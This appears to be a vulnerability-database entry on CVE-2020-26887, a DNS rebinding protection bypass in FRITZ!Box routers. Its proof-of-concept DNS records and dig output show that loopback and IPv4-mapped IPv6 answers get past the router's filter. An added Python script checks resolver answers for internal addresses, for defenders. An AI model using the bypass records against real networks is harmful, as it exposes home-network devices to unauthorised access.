CVE-2020-26887 DNS Rebinding Protection Bypass Vulnerability

A free, open vulnerability database that anyone can edit -- pwnwiki.com

Fixed version

>= 7.21

POC

Suppose the following resource records (RRs) are configured for different
subdomains of example.com:

------------------------------------------------------------------------
private.example.com        1  IN  A     192.168.178.20
local.example.com          1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain
private.example.com returns an empty answer, as expected:

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.	IN	A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com and
local.example.com return the configured resource records successfully,
effectively bypassing the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.	IN	AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.	IN	A

;; ANSWER SECTION:
local.example.com. 1	IN	A	127.0.0.1
------------------------------------------------------------------------
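
The two answers that passed above carry a loopback address and an IPv4-mapped IPv6 address. The following added example (not from the original advisory and not the vendor's code) shows a defender-side check that classifies A/AAAA answers in dig-style output and unwraps IPv4-mapped addresses before testing them; the function names and the two public sample records are assumptions made for illustration.

```python
import ipaddress

def is_internal(addr: str) -> bool:
    """True if a rebinding filter should drop an answer with this address."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the embedded IPv4 address
    # is what gets classified, not the IPv6 wrapper around it.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified

def flag_answers(dig_output: str):
    """Return (name, type, address) for A/AAAA answers that point inside."""
    hits = []
    for line in dig_output.splitlines():
        if not line.strip() or line.startswith(";"):
            continue  # skip blank lines and dig's comment/header lines
        fields = line.split()  # name, TTL, class, type, rdata
        if len(fields) == 5 and fields[2] == "IN" and fields[3] in ("A", "AAAA"):
            if is_internal(fields[4]):
                hits.append((fields[0], fields[3], fields[4]))
    return hits

# Constructed sample: the first two records mirror the answers shown above;
# the two "public" records are added here as negative controls.
SAMPLE = (
    ";; ANSWER SECTION:\n"
    "privateipv6.example.com. 1\tIN\tAAAA\t::ffff:192.168.178.20\n"
    "local.example.com. 1\tIN\tA\t127.0.0.1\n"
    "public.example.com. 1\tIN\tA\t8.8.8.8\n"
    "mapped-public.example.com. 1\tIN\tAAAA\t::ffff:8.8.8.8\n"
)

if __name__ == "__main__":
    for name, rtype, addr in flag_answers(SAMPLE):
        print(f"internal address in answer: {name} {rtype} {addr}")
```

Running the same check against answers returned by a resolver after upgrading to a fixed version is a quick way to confirm that such records are no longer passed through.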
